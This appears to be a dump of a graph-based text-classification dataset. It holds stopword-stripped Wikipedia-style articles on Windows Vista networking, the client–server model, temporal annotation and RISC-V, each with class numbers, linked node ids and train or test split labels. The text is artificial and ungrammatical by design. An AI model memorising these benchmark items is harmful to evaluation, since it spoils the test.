structured manner print schemas intended address problems associated internal communication components print subsystem external communication print subsystem applications windows vista contains new networking stack brings large improvements areas network-related functionality includes native implementation ipv6 well complete overhaul ipv4 ipv6 supported networking components services user interface ipv6 mode windows vista use link local multicast name resolution llmnr protocol resolve names local hosts network dns server running new tcp/ip stack uses new method store configuration settings enables dynamic control require computer restart settings changed new stack also based strong host model features infrastructure enable modular components dynamically inserted removed user interface configuring troubleshooting working network connections changed significantly prior versions windows well users make use new network center see status network connections access every aspect configuration network browsed using network explorer replaces windows xp network places network explorer items shared device scanner file share network location awareness uniquely identifies network exposes network attributes connectivity type windows vista graphically presents different devices connected network network map view using lltd protocol addition network map uses lltd determine connectivity information media type wired wireless device implement lltd appear network map icon representing device allowing users one-click access device user interface lltd invoked provides metadata device contains static state information mac address ipv4/ipv6 address signal strength etc support wireless networks built network stack emulate wired connections case previous versions windows allows implementation wireless-specific features larger frame sizes optimized error recovery procedures windows vista uses various techniques like receive window auto-scaling explicit congestion notification tcp chimney offload compound tcp improve networking performance quality service qos policies used prioritize network traffic traffic shaping available applications even explicitly use qos apis windows vista includes in-built support peer-to-peer networks smb 2.0 improved network security windows vista supports 256-bit 384-bit diffie-hellman dh algorithms well 128-bit 192-bit 256-bit advanced encryption standard aes included network stack integrating ipsec windows firewall windows vista introduces overhaul previous windows nt operating system loader architecture ntldr used versions windows nt since inception windows nt 3.1 ntldr completely replaced new architecture designed address modern firmware technologies unified extensible firmware interface new architecture introduces firmware-independent data store backward compatible previous versions windows operating system windows vista introduces improved driver model windows driver foundation opt-in framework replace older windows driver model includes windows vista includes following changes enhancements processor power management windows vista first client version windows ship .net framework specifically includes .net framework 2.0 .net framework 3.0 previously known winfx version 1.0 1.1 .net framework set managed code apis slated succeed win32 win32 api also present windows vista give direct access new functionality introduced .net framework addition .net framework intended give programmers easier access functionality present windows .net framework 3.0 includes apis ado.net asp.net windows forms among others adds four core frameworks .net framework windows presentation foundation codenamed avalon overhaul graphical subsystem windows flagship resolution independent api 2d 3d graphics raster vector graphics xaml fixed adaptive documents xps advanced typography animation xaml data binding audio video windows vista wpf enables richer control design development visual aspects windows programs based directx renders graphics using direct3d routing graphics direct3d allows windows offload graphics tasks gpu reducing workload computer cpu capability used desktop window manager make desktop windows shell elements 3d surfaces wpf applications deployed desktop hosted web browser xbap 3d capabilities wpf limited compared available direct3d however wpf provides tighter integration features like user interface ui documents media makes possible 3d ui 3d documents 3d media set built-in controls provided part wpf containing items button menu list box controls wpf provides ability perform control composition control contain control layout wpf also built-in set data services enable application developers bind data controls images supported using windows imaging component media wpf supports audio video formats windows media player play addition wpf supports time-based animations contrast frame-based approach delinks speed animation slow fast system performing text anti-aliased rendered using cleartype wpf uses extensible application markup language xaml variant xml intended use developing user interfaces using xaml develop user interfaces also allows separation model view xaml every element maps onto class underlying api attributes set properties instantiated classes elements wpf may also coded .net language c xaml code ultimately compiled managed assembly way .net languages means use xaml development incur performance cost windows communication foundation codenamed indigo new communication subsystem enable applications one machine across multiple machines connected network communicate wcf programming model unifies web services .net remoting distributed transactions message queues single service-oriented architecture model distributed computing server exposes service via interface defined using xml clients connect wcf runs sandbox provides enhanced security model .net applications provide wcf capable using soap communication two processes thereby making wcf based applications interoperable process communicates via soap wcf process communicates non-wcf process xml based encoding used soap messages communicates another wcf process soap messages encoded optimized binary format optimize communication encodings conform data structure soap format called infoset windows vista also incorporates microsoft message queuing 4.0 msmq supports subqueues poison messages messages continually fail processed correctly receiver transactional receives messages remote queue windows workflow foundation microsoft technology defining executing managing workflows technology part .net framework 3.0 therefore targeted primarily windows vista operating system windows workflow foundation runtime components provide common facilities running managing workflows hosted clr application domain workflows comprise 'activities developers write domain-specific activities use workflows windows workflow foundation also provides set general-purpose 'activities cover several control flow constructs also includes visual workflow designer workflow designer used within visual studio 2005 including integration visual studio project system debugger windows cardspace codenamed infocard part .net framework 3.0 implementation identity metasystem centralizes acquiring usage management digital identity digital identity represented logical security tokens consist one claims provide information different aspects identity name address etc identity system centers around three entities — user identified identity provider provides identifying information regarding user relying party uses identity authenticate user identity provider may service like active directory even user provides authentication password biometric authentication data relying party issues request application identity means policy states claims needs physical representation security token application passes request windows cardspace contacts suitable identity provider retrieves identity provides application identity along information use windows cardspace also keeps track identities used represents visually identifiable virtual cards accessible user centralized location whenever application requests identity windows cardspace informs user identity used needs confirmation provides requestor identity windows cardspace presents api allows application use windows cardspace handle authentication tasks similarly api allows identity providers hook windows cardspace relying party appears service provides authentication credentials media foundation set com-based apis handle audio video playback provides directx video acceleration 2.0 better resilience cpu i/o memory stress glitch-free low-latency playback audio video also enables high color spaces multimedia processing pipeline directshow windows media sdk gradually deprecated future versions windows vista instant search index also accessed programmatically using managed well native code native code connects index catalog using data source object retrieved windows vista shell indexing service ole db provider managed code use msidxs ado.net provider index catalog name catalog remote machine also specified using unc path criteria search specified using sql-like syntax default catalog called systemindex stores properties indexed items predefined naming pattern example name location documents system exposed table column names system itemname system itemurl respectively sql query directly refer tables index catalogues use msidxs provider run queries search index also used via ole db using collatordso provider however ole db provider read-only supporting select group sql statements windows search api also used convert search query written using advanced query syntax natural query syntax natural language version aqs sql queries exposes method generatesqlfromuserquery method isearchqueryhelper interface searches also performed using search-ms protocol pseudo protocol lets searches exposed uri contains operators search terms specified aqs refer saved search folders well uri activated windows search registered handler protocol parses uri extract parameters perform search winsock kernel wsk new transport-independent kernel-mode network programming interface npi provides tdi client developers sockets-like programming model similar supported user-mode winsock sockets programming concepts exist user-mode winsock socket creation bind connect accept send receive winsock kernel completely new programming interface unique characteristics asynchronous i/o uses irps event callbacks enhance performance tdi supported windows vista backward compatibility windows vista includes specialized qos api called qwave quality windows audio/video experience pre-configured quality service module time dependent multimedia data audio video streams qwave uses different packet priority schemes real-time flows multimedia packets best-effort flows file downloads e-mails ensure real time data gets little delays possible providing high quality channel data packets windows filtering platform allows external applications access hook packet processing pipeline networking subsystem windows vista features update microsoft crypto api known cryptography api next generation cng cng extensible user mode kernel mode api includes support elliptic curve cryptography number newer algorithms part national security agency nsa suite b also integrates smart card subsystem including base csp module encapsulates smart card api developers write complex csps
[ 10243, 4107, 5643, 4624, 9745, 11283, 537, 540, 3102, 4127, 2593, 4130, 8227, 8740, 9762, 1577, 4138, 2603, 10281, 1581, 4141, 9263, 3122, 4146, 4148, 1077, 2101, 8246, 1081, 8763, 10812, 5181, 3648, 9799, 1098, 7754, 10828, 4173, 4174, 9...
None
2,222
5
Client–server_model:client–server model client–server model distributed application structure partitions tasks workloads providers resource service called servers service requesters called clients often clients servers communicate computer network separate hardware client server may reside system server host runs one server programs share resources clients client share resources requests server content service function clients therefore initiate communication sessions servers await incoming requests examples computer applications use client–server model email network printing world wide web client-server characteristic describes relationship cooperating programs application server component provides function service one many clients initiate requests services servers classified services provide example web server serves web pages file server serves computer files shared resource may server computer software electronic components programs data processors storage devices sharing resources server constitutes service whether computer client server determined nature application requires service functions example single computer run web server file server software time serve different data clients making different kinds requests client software also communicate server software within computer communication servers synchronize data sometimes called inter-server server-to-server communication general service abstraction computer resources client concerned server performs fulfilling request delivering response client understand response based well-known application protocol i.e content formatting data requested service clients servers exchange messages request–response messaging pattern client sends request server returns response exchange messages example inter-process communication communicate computers must common language must follow rules client server know expect language rules communication defined communications protocol client-server protocols operate application layer application layer protocol defines basic patterns dialogue formalize data exchange even server may implement application programming interface api api abstraction layer accessing service restricting communication specific content format facilitates parsing abstracting access facilitates cross-platform data exchange server may receive requests many distinct clients short period time computer perform limited number tasks moment relies scheduling system prioritize incoming requests clients accommodate prevent abuse maximize availability server software may limit availability clients denial service attacks designed exploit server obligation process requests overloading excessive request rates bank customer accesses online banking services web browser client client initiates request bank web server customer login credentials may stored database web server accesses database server client application server interprets returned data applying bank business logic provides output web server finally web server returns result client web browser display step sequence client–server message exchanges computer processes request returns data request-response messaging pattern requests met sequence complete web browser presents data customer example illustrates design pattern applicable client–server model separation concerns early form client–server architecture remote job entry dating least os/360 announced 1964 request run job response output formulating client–server model 1960s 1970s computer scientists building arpanet stanford research institute used terms server-host serving host user-host using-host appear early documents rfc 5 rfc 4 usage continued xerox parc mid-1970s one context researchers used terms design computer network programming language called decode-encode language del purpose language accept commands one computer user-host would return status reports user encoded commands network packets another del-capable computer server-host received packets decoded returned formatted data user-host del program user-host received results present user client–server transaction development del beginning 1969 year united states department defense established arpanet predecessor internet client-host server-host subtly different meanings client server host computer connected network whereas words server client may refer either computer computer program server-host user-host always refer computers host versatile multifunction computer clients servers programs run host client–server model server likely devoted task serving early use word client occurs separating data function distributed file system 1978 paper xerox parc computer scientists howard sturgis james mitchell jay israel authors careful define term readers explain use distinguish user user network node client 1992 word server entered general parlance client–server model dictate server-hosts must resources client-hosts rather enables general-purpose computer extend capabilities using shared resources hosts centralized computing however specifically allocates large amount resources small number computers computation offloaded client-hosts central computers simpler client-hosts relies heavily network resources servers infrastructure computation storage diskless node loads even operating system network computer terminal operating system input/output interface server contrast fat client personal computer many resources rely server essential functions microcomputers decreased price increased power 1980s late 1990s many organizations transitioned computation centralized servers mainframes minicomputers fat clients afforded greater individualized dominion computer resources complicated information technology management 2000s web applications matured enough rival application software developed specific microarchitecture maturation affordable mass storage advent service-oriented architecture among factors gave rise cloud computing trend 2010s addition client–server model distributed computing applications often use peer-to-peer p2p application architecture client–server model server often designed operate centralized system serves many clients computing power memory storage requirements server must scaled appropriately expected work-load i.e number clients connecting simultaneously load-balancing failover systems often employed scale server implementation peer-to-peer network two computers peers pool resources communicate decentralized system peers coequal equipotent nodes non-hierarchical network unlike clients client–server client–queue–client network peers communicate directly peer-to-peer networking algorithm peer-to-peer communications protocol balances load even peers modest resources help share load node becomes unavailable shared resources remain available long peers offer ideally peer need achieve high availability redundant peers make resource downtime availability load capacity peers change protocol reroutes requests client-server master-slave regarded sub-categories distributed peer-to-peer systems
[ 10242, 10245, 7175, 9225, 4107, 9744, 7188, 5658, 6694, 1586, 1618, 5214, 3581, 4194, 10341, 6769, 119, 7812, 6281, 3729, 8871, 7341, 10926, 8386, 7364, 10438, 11472, 9440, 225, 8929, 9441, 754, 2804, 10486, 6403, 1812, 10518, 5399, 10522, ...
Test
2,223
0
Temporal_annotation:temporal annotation temporal annotation study automatically add semantic information regarding time natural language documents plays role natural language processing computational linguistics temporal annotation involves application semantic annotation document significant temporal annotation standards include timeml iso-timeml tides standards typically include annotations temporal expressions timexes events temporal relations temporal signals temporal relation types natural language texts events may associated times e.g. may start end given time events also associated events like occurring call relations temporal relations temporal relation typing classifies relation two arguments important difficult sub-task figuring temporal information document allen interval algebra one scheme types temporal relations rule-engineering machine learning approaches temporal annotation successful though achieving high performance temporal relation typing remains difficult task successful temporal annotation enables systems find facts asserted texts true build timelines extract plans discover mentions change applications many domains information extraction digital history processing social media clinical text mining tempeval task series sets shared temporal annotation task run semeval three times attracting system entries around world task originally centred determining types temporal relations tempeval-2 -3 expanded include event timex annotation addition i2b2 clinical evaluation shared task temporal annotation exercise 2012 attracted great deal interest
[ 1890, 7780, 1737, 2059, 5781, 8440 ]
Test
2,224
3
RISC-V:risc-v risc-v pronounced risk-five open-source hardware instruction set architecture isa based established reduced instruction set computer risc principles project began 2010 university california berkeley many contributors volunteers affiliated university june 2019 version 2.2 user-space isa version 1.11 privileged isa frozen permitting software hardware development proceed debug specification available draft version 0.3 usable new isas usually expensive computer-designers normally afford work free also developing cpu requires design expertise several specialties electronic digital logic compilers operating systems rare find team outside professional engineering organization team normally paid money charged designs therefore commercial vendors computer designs arm holdings mips technologies charge royalties use designs patents copyrights also often require non-disclosure agreements releasing documents describe designs detailed advantages instruction set many cases never describe reasons design choices expense secrecy make development new hardware software much difficult also prevents security audits another result modern high-quality general-purpose computer instruction sets explained available except academic settings risc-v started solve problems goal make practical isa open-sourced usable academically hardware software design without royalties also rationales every part project explained least broadly risc-v authors academic substantial experience computer design risc-v isa direct development series academic computer-design projects originated part aid projects address cost design project started academic research funded darpa order build large continuing community users therefore accumulate designs software risc-v isa designers planned support wide variety practical uses small fast low-power real-world implementations without over-architecting particular microarchitecture need large base contributors part reason risc-v engineered fit many uses therefore many risc-v contributors see project unified community effort term risc dates 1980 knowledge simpler computers could effective design principles widely described simple effective computers always academic interest academics created risc instruction set dlx first edition computer architecture quantitative approach 1990 david patterson author later assisted risc-v. dlx intended educational use academics hobbyists implemented using field-programmable gate arrays commercial success arm cpus versions 2 earlier public-domain instruction set still supported gnu compiler collection gcc popular free-software compiler three open-source cores exist isa manufactured openrisc open-source isa based dlx associated risc designs fully supported gcc linux implementations however commercial implementations krste asanović university california berkeley found many uses open-source computer system 2010 decided develop publish one short three-month project summer plan help academic industrial users david patterson berkeley also aided effort originally identified properties berkeley risc risc-v one long series cooperative risc research projects stage students inexpensively provided initial software simulations cpu designs risc-v authors institution originally provided isa documents several cpu designs bsd licenses allow derivative works—such risc-v chip designs—to either open free closed proprietary early funding darpa commercial users require isa stable utilize product might last many years address issue risc-v foundation formed maintain publish intellectual property related risc-v definition original authors owners surrendered rights foundation designers say instruction set main interface computer lies hardware software good instruction set open available use dramatically reduce cost software permitting far reuse also increase competition among hardware providers use resources design less software support designers assert new principles becoming rare instruction set design successful designs last forty years become increasingly similar failed sponsoring companies failed commercially instruction sets poor technically well-designed open instruction set designed using well-established principles attract long-term support many vendors prior open isas used gnu general public license gpl encouraging users open implementations copying use others unlike academic designs optimized simplicity exposition designers state risc-v instruction set practical computers said features increase computer speed yet reduce cost power use include load–store architecture bit patterns simplify multiplexers cpu simplified standards-based floating-point design architecturally neutral placing most-significant bits fixed location speed sign-extension sign extension said often critical timing path instruction set designed wide range uses supports three word-widths 32 64 128 bits variety subsets definitions subset vary slightly three word-widths subsets support small embedded systems personal computers supercomputers vector processors warehouse-scale rack-mounted parallel computers instruction set variable-width extensible encoding bits always added space 128-bit stretched version isa reserved 60 years industry experience shown unrecoverable error instruction set design lack memory address space 128-bit isa remains undefined intentionally yet little practical experience large memory systems proposals implement variable-width instructions 864-bits risc-v also supports designers academic uses simplicity integer subset permits basic student exercises integer subset simple isa enabling software control research machines variable-length isa enables extensions student exercises research separated privileged instruction set permits research operating system support without redesigning compilers risc-v open intellectual property allows designs published reused modified normal problem new instruction set lack cpu designs software issues limit usability reduce adoption risc-v website specification user-mode instructions preliminary specification general-purpose privileged instruction set support operating systems several open-sourced risc-v cpu designs including 64-bit berkeley order machine boom 64-bit rocket five 32-bit sodor cpu designs berkeley picorv32 clifford wolf scr1 syntacore pulpino riscy zero-riscy eth zürich university bologna others three-stage sodor cpu appears apt small embedded cpu rocket may suit compact low-power intermediate computers personal devices boom uses much infrastructure created rocket may usable personal supercomputer warehouse-scale computers picorv scr1 32-bit microcontroller unit mcu class rv32imc implementations verilog cores pulpino implement simple rv32imc isa micro-controllers zero-riscy powerful rv32imfc isa custom dsp extensions embedded signal processing design software includes design compiler chisel reduce designs verilog use devices website includes verification data testing core implementations available risc-v software tools include gnu compiler collection gcc toolchain gdb debugger llvm toolchain ovpsim simulator library risc-v fast processor models spike simulator simulator qemu operating system support exists linux kernel freebsd netbsd supervisor-mode instructions unstandardized prior june 2019 support provisional preliminary freebsd port risc-v architecture upstreamed february 2016 shipped freebsd 11.0 ports debian fedora stabilizing port das u-boot exists uefi spec v2.7 defined risc-v binding tianocore port done hpe engineers expected upstreamed preliminary port sel4 microkernel simulator exists run risc-v linux system web browser using javascript hex five released first secure iot stack risc-v freertos support also see comparison real-time operating systems risc-v modular design consisting alternative base parts added optional extensions isa base extensions developed collective effort industry research community educational institutions base specifies instructions encoding control flow registers sizes memory addressing logic i.e. integer manipulation ancillaries base alone implement simplified general-purpose computer full software support including general-purpose compiler standard extensions specified work standard bases without conflict many risc-v computers might implement compact extension reduce power consumption code size memory use also future plans support hypervisors virtualization together supervisor instruction set extension rvgc defines instructions needed conveniently support operating system unix-style portable operating system interface posix tame combinations functionality may implemented nomenclature defined specify instruction set base specified first coding risc-v register bit-width variant e.g. rv64i rv32e follows letters specifying implemented extensions canonical order base extended integer floating point calculations synchronisation primitives multi-core computing base extensions mafd considered necessary general-purpose computation thus shorthand g. small 32-bit computer embedded system might rv32ec large 64-bit computer might rv64gc i.e. shorthand rv64imafdc naming scheme zxxx standard extensions yxxx non-standard vendor-specific extensions proposed example ztso extension total store ordering alternative memory consistency model weak memory ordering discussion risc-v 32 16 embedded variant integer registers floating-point extension implemented 32 floating-point registers except memory access instructions instructions address registers first integer register zero register remainder general-purpose registers store zero register effect read always provides 0 using zero register placeholder makes simpler instruction set control status registers exist user-mode programs access used performance measurement floating-point management instructions exist save restore multiple registers thought needless complex perhaps slow like many risc designs risc-v load–store architecture instructions address registers load store instructions conveying memory load store instructions include 12-bit offset two register identifiers one register base register register source write destination read offset added base register get address forming address base register plus offset allows single instructions access data structures example base register points top stack single instructions access subroutine local variables stack likewise load store instructions access record-style structure memory-mapped i/o device using constant zero register base address allows single instructions access memory around address zero memory addressed 8-bit bytes words little-endian order words register size accessed load store instructions accessed memory addresses need aligned word-width accesses aligned addresses may faster example simple cpus may implement unaligned accesses slow software emulation driven alignment failure interrupt risc-v manages memory systems shared cpus threads ensuring thread execution always sees memory operations programmed order threads i/o devices risc-v simplified n't guarantee order memory operations except specific instructions instruction guarantees results predecessor operations visible successor operations threads i/o devices guarantee order combinations memory memory-mapped i/o operations e.g separate memory read write operations without affecting i/o operations system operate i/o devices parallel memory n't force wait one cpu one thread may decode like many risc instruction sets complex instruction set computer cisc instruction sets x86 ibm system/360 families risc-v lacks address-modes write back registers example auto-increment risc-v little-endian resemble familiar successful computers example x86 also reduces cpu complexity costs slightly reads sizes words order example risc-v instruction set decodes starting lowest-addressed byte instruction specification leaves open possibility non-standard big-endian bi-endian systems risc cpus mips powerpc dlx berkeley risc-i place 16 bits offset loads stores set upper 16 bits load upper word instruction permits upper-halfword values set easily without shifting bits however use upper half-word instruction makes 32-bit constants like addresses risc-v uses sparc-like combination 12-bit offsets 20-bit set upper instructions smaller 12-bit offset helps compact 32-bit load store instructions select two 32 registers yet still enough bits support risc-v variable-length instruction coding risc-v handles 32-bit constants addresses instructions set upper 20 bits 32-bit register load upper immediate loads 20 bits bits 31 12 second instruction set bottom 12 bits method extended permit position-independent code adding instruction generates 20 upper address bits adding offset program counter storing result base register permits program generate 32-bit addresses relative program counter base register often used as-is 12-bit offsets loads stores needed set lower 12-bits register 64-bit 128-bit isas sign-extend result get larger address fast cpus may interpret combinations instructions single fused instructions may good candidates fuse loads stores risc-v subroutine call jump link places return address register faster many computer designs saves memory access compared systems push return address directly stack memory 20-bit signed 2 complement offset offset multiplied 2 added pc generate relative address 32-bit instruction result 32-bit address i.e. evenly divisible 4 cpu may force exception risc-v cpus jump calculated addresses using jump link-register instruction similar gets destination address adding 12-bit offset base register contrast adds larger 20-bit offset pc bit format like register-relative loads stores like used instructions set upper 20 bits base register make 32-bit branches either absolute address using pc-relative one using position-independent code using constant zero base address allows single-instruction calls small offset fixed positive negative address risc-v recycles get unconditional 20-bit pc-relative jumps unconditional register-based 12-bit jumps jumps make linkage register 0 return address saved risc-v also recycles return subroutine base register set linkage register saved offset zero linkage register zero offset return address saved like many risc designs subroutine call risc-v compiler must use individual instructions save registers stack start restore stack exit risc-v save multiple restore multiple register instructions thought make cpu complex possibly slow take code space designers planned reduce code size library routines save restore registers risc-v condition code register carry bit designers believed condition codes make fast cpus complex forcing interactions instructions different stages execution choice makes multiple-precision arithmetic complex also numerical tasks need energy instead risc-v short branches perform comparisons equal not-equal less-than unsigned less-than greater-than equal unsigned greater-than equal ten comparison-branch operations implemented six instructions reversing order operands assembler example branch greater done less-than reversed order operands comparing branches twelve-bit signed range jump relative pc risc-v isa requires default branch predictions cpus backward conditional branches predicted taken forward conditional branches predict taken predictions easy decode pipelined cpu branch addresses signed numbers added pc backward branches negative two complement addresses thus one significant bit address forward branches zero significant bit fixed location operation code speed pipeline complex cpus add branch predictors work well even unusual data situations isa manual recommends software optimized avoid branch stalls using default branch predictions reuses significant bit signed relative address hint bit tell whether conditional branch taken hint bits needed operation codes risc-v branches makes bits available branch operation codes simple inexpensive cpus merely follow default predictions still perform well optimizing compilers compilers still perform statistical path optimization desired avoid needless loading branch prediction electronics thus needless pipeline stalls comparing branch codes never used unconditional jumps risc-v support predication conditional execution instructions designers claim cpus without predication easier design optimizing compilers less likely mistakenly use predication used designers claim fast out-of-order cpu designs predication anyway comparison branch conditional code parallel discarding unused path effects also claim even simpler cpus predication less valuable branch prediction prevent stalls associated conditional branches code without predication larger branches also claim compressed instruction set risc-v set c solves problem cases many risc designs included branch delay slot position branch instruction filled instruction executed whether branch taken feature improve performance pipelined cpus absorbing time wasted cpu mispredicts operation conditional branch cpu pipeline stalls risc-v omits branch delay slot complicates multicycle cpus superscalar cpus long pipelines dynamic branch predictors succeeded well enough reduce need delayed branches risc-v segregates math minimal set integer instructions set add subtract shift bit-wise logic comparing-branches simulate risc-v instruction sets software atomic instructions notable exception risc-v currently lacks count leading zero bit-field operations normally used speed software floating-point pure-integer processor integer multiplication instructions set includes signed unsigned multiply divide double-precision integer multiplies divides included multiplies divides produce high word result isa document recommends implementors cpus compilers fuse standardized sequence high low multiply divide instructions one operation possible floating-point instructions set f includes single-precision arithmetic also comparison-branches similar integer arithmetic requires additional set 32 floating-point registers separate integer registers double-precision floating point instructions set generally assume floating-point registers 64-bit i.e. double-width f subset coordinated set quad-precision 128-bit floating-point isa q also defined risc-v computers without floating-point use floating-point software library risc-v cause exceptions arithmetic errors including overflow underflow subnormal divide zero instead integer floating-point arithmetic produce reasonable default values set status bits divide-by-zero discovered one branch division status bits tested operating system periodic interrupt risc-v supports computers share memory multiple cpus threads risc-v standard memory consistency model release consistency loads stores may generally reordered loads may designated acquire operations must precede later memory accesses stores may designated release operations must follow earlier memory accesses base instruction set includes minimal support form instruction enforce memory ordering although sufficient provides acquire provides release combined operations efficient atomic memory operation extension supports two types atomic memory operations release consistency first provides general purpose load-reserved store-conditional instructions performs load tries reserve address thread later store-conditional reserved address performed reservation broken intervening store another source store succeeds zero placed register failed non-zero value indicates software needs retry operation either case reservation released second group atomic instructions perform read-modify-write sequences load optionally load-acquire destination register operation loaded value source register store result may optionally store-release making memory barriers optional permits combining operations optional operations enabled acquire release bits present every atomic instruction risc-v defines nine possible operations swap use source register value directly add bitwise exclusive-or signed unsigned minimum maximum system design may optimize combined operations example destination register swap constant zero load may skipped value stored unmodified since load store may skipped ibm system/370 successors including z/architecture x86 implement compare-and-swap instruction tests conditionally updates location memory location contains expected old value replaces given new value returns indication whether made change however simple load-type instruction usually performed fetch old value classic problem thread reads loads value calculates new value c uses replace c way know whether concurrent activity another thread replaced value b restored algorithms e.g. ones values memory pointers dynamically allocated blocks aba problem lead incorrect results common solution employs double-wide instruction update pointer adjacent counter unfortunately instruction requires special instruction format specify multiple registers performs several reads writes complex bus operation alternative efficient usually requires one memory load minimizing slow memory operations desirable also exact controls accesses memory cell rather assuring bit pattern however unlike permit livelock two threads repeatedly cause instructions fail risc-v guarantees forward progress livelock code follows rules timing sequence instructions 1 must use subset 2 prevent repetitive cache misses code including retry loop must occupy 16 consecutive instructions 3 must include system fence instructions taken backward branches 4 backward branch retry loop must original sequence specification gives examples use subset lock data structure standard risc-v isa specifies instructions 32 bits makes particularly simple implementation like risc processors instruction encoding results larger code size instruction sets compensate risc-v 32-bit instructions actually 30 bits opcode space reserved optional recommended variable-length compressed instruction set rvc includes 16-bit instructions like arm thumb mips16 compressed instructions simply aliases subset larger instructions unlike arm thumb mips compressed set space reserved beginning separate operating mode standard compressed instructions may intermixed freely letter c like thumb-1 mips16 compressed instructions simply alternate encodings aliases selected subset larger instructions compression implemented assembler essential compiler even know prototype rvc tested 2011 prototype code 20 smaller x86 pc mips compressed code 2 larger arm thumb-2 code also substantially reduced needed cache memory estimated power use memory system researcher intended reduce code binary size small computers especially embedded computer systems prototype included 33 frequently used instructions recoded compact 16-bit formats using operation codes previously reserved compressed set compression done assembler changes compiler compressed instructions omitted fields often zero used small immediate values accessed subsets 16 8 registers common often compressible much difference size compared arm thumb set occurred risc-v prototype instructions save restore multiple registers instead compiler generated conventional instructions access stack prototype rvc assembler often converted compressed forms half size however still took code space arm instructions save restore multiple registers researcher proposed modify compiler call library routines save restore registers routines would tend remain code cache thus run fast though probably fast save-multiple instruction standard rvc requires occasional use 32-bit instructions several nonstandard rvc proposals complete requiring 32-bit instructions said higher densities standard rvc another proposal builds claims use less coding range well instruction set smallest embedded cpus set e reduced ways 16 32-bit integer registers supported floating-point instructions supported specification forbids uneconomical floating-point software library must used compressed set c recommended privileged instruction set supports machine mode user mode memory schemes use base-and-bound address relocation discussion occurred microcontroller profile risc-v ease development deeply embedded systems centers faster simple c-language support interrupts simplified security modes simplified posix application binary interface correspondents also proposed smaller non-standard 16-bit rv16e isas several serious proposal would use 16-bit c instructions 8 × 16-bit registers april fools joke proposed practical arrangement utilize 16 × 16-bit integer registers standard eimc isas including 32-bit instructions joke propose bank-switching registers 32-bit cpu would clearly superior risc-v isa includes separate privileged instruction set specification version 1.11 ratified foundation version 1.11 specification supports several types computer systems correspond roughly systems four rings privilege security machine hypervisor supervisor user layer also expected thin layer standardized supporting software communicates more-privileged layer hardware overall plan isa make hypervisor mode orthogonal user supervisor modes basic feature configuration bit either permits supervisor-level code access hypervisor registers causes interrupt accesses bit lets supervisor mode directly handle hardware needed hypervisor simplifies type 2 hypervisor hosted operating system popular mode run warehouse-scale computers support type 1 unhosted hypervisors bit cause accesses interrupt hypervisor bit simplifies nesting hypervisors hypervisor runs hypervisor also said simplify supervisor code letting kernel use hypervisor features kernel code result hypervisor form isa supports five modes machine supervisor user supervisor-under-hypervisor user-under-hypervisor privileged instruction set specification explicitly defines hardware threads harts multiple hardware threads common practice more-capable computers one thread stalled waiting memory others often proceed hardware threads help make better use large number registers execution units fast out-of-order cpus finally hardware threads simple powerful way handle interrupts saving restoring registers required simply executing different hardware thread however hardware thread required risc-v computer thread zero existing control status register definitions support risc-v error memory exceptions small number interrupts systems interrupts specification also defines interrupt controller interrupts always start highest-privileged machine level control registers level explicit forwarding bits route interrupts less-privileged code example hypervisor need include software executes interrupt forward interrupt operating system instead set-up set bits forward interrupt several memory systems supported specification physical-only suited simplest embedded systems also three unix-style virtual memory systems memory cached mass-storage systems virtual memory systems three sizes addresses sized 32 39 48-bits virtual memory systems support 4 kib pages multilevel page-table trees use similar algorithms walk page table trees designed either hardware software page-table walking optionally reduce cost page table walks super-sized pages may leaf pages higher levels system page table tree sv32 two layer page table tree supports 4 mib superpages sv39 three level page table supports 2 mib superpages 1 gib gigapages sv48 required support sv39 also 4-level page table supports 2 mib superpages 1 gib gigapages 512 gib terapages superpages aligned page boundaries next-lowest size page substantial work done produce preliminary though unapproved bit-manipulation b isa risc-v done well bit-manipulation subset aid cryptographic graphic mathematical operations criteria inclusion documented draft compliance rv5 philosophies isa formats substantial improvements code density speed i.e. least 3-for-1 reduction instructions substantial real-world applications including preexisting compiler support version 0.37 included uncontroversial instructions count leading zeros count one bits perform complement shift ones rotate generalized bit-reverse shuffle byte swaps bit extracts deposits bit-manipulation additions compressed set also includes controversial proposal bit-field extract place using nonstandard 48-bit instruction format simple cost-reduced risc-v systems proposal use floating-point registers bits perform parallel single instruction multiple data simd sub-word arithmetic widely used accelerate multimedia digital signal processing isa undefined could resemble pa-risc multimedia instructions multimedia acceleration extensions besides native 64-bit math pa-risc max2 cpu could arithmetic four 16-bit subwords several overflow methods also could move subwords different positions pa-risc max2 intentionally simplified lacked support 8-bit 32-bit subwords 16-bit subword size chosen support digital signal processing tasks instructions inexpensive design build however increased cpu performance digital signal processing tasks 48-fold enabling practical real-time video codecs 1995 proposed vector-processing instruction set may make packed simd set obsolete designers hope enough flexibility cpu implement vector instructions standard processor registers would enable minimal implementations similar performance multimedia isa however true vector coprocessor could execute code higher performance vector-processing proposal conservative flexible design general-purpose mixed-precision vector processor suitable execute compute kernels code would port easily cpus differing vector lengths ideally without recompiling contrast short-vector simd extensions less convenient used x86 arm pa-risc change word-width forces change instruction set expand vector registers case x86 64-bit mmx registers 128-bit streaming simd extensions sse 256-bit advanced vector extensions avx avx-512 result growing instruction set need port working code new instructions risc-v vector isa rather fix vector length architecture instruction available takes requested size sets vector length minimum hardware limit requested size risc-v proposal like cray long-vector design vector 32 vectors length application specifies total vector width requires processor determines vector length provide available on-chip resources takes form instruction four immediate operands specifying number vector registers available width needed total must addressable limit 32 may less application require vector length limited available on-chip storage divided number bytes storage needed entry added hardware limits may also exist turn may permit simd-style implementations outside vector loops application request zero-vector registers saving operating system work preserving context switches vector length architecturally variable designed vary run time also achieve flexibility instruction set likely use variable-width data paths variable-type operations using polymorphic overloading plan reduce size complexity isa compiler recent experimental vector processors variable-width data paths also show profitable increases operations per second speed area lower cost watt longer battery life unlike typical modern graphics processing unit plans provide special hardware support branch predication instead lower cost compiler-based predication used preliminary specification risc-v hardware-assisted debugger debugger use transport system joint test action group jtag universal serial bus usb access debug registers standard hardware debug interface may support either standardized abstract interface instruction feeding exact form abstract interface remains undefined proposals include memory mapped system standardized addresses registers debug devices command register data register accessible communication system correspondents claim similar systems used freescale background debug mode interface bdm cpus arm openrisc aeroflex leon instruction feeding cpu process debug exception execute individual instructions written register may supplemented data-passing register module directly access memory instruction feeding lets debugger access computer exactly software would also minimizes changes cpu adapts many types cpu said especially apt risc-v designed explicitly many types computers data-passing register allows debugger write data-movement loop ram execute loop move data computer speed near maximum speed debug system data channel correspondents say similar systems used mips technologies mips intel quark tensilica xtensa freescale power isa cpus background debug mode interface bdm
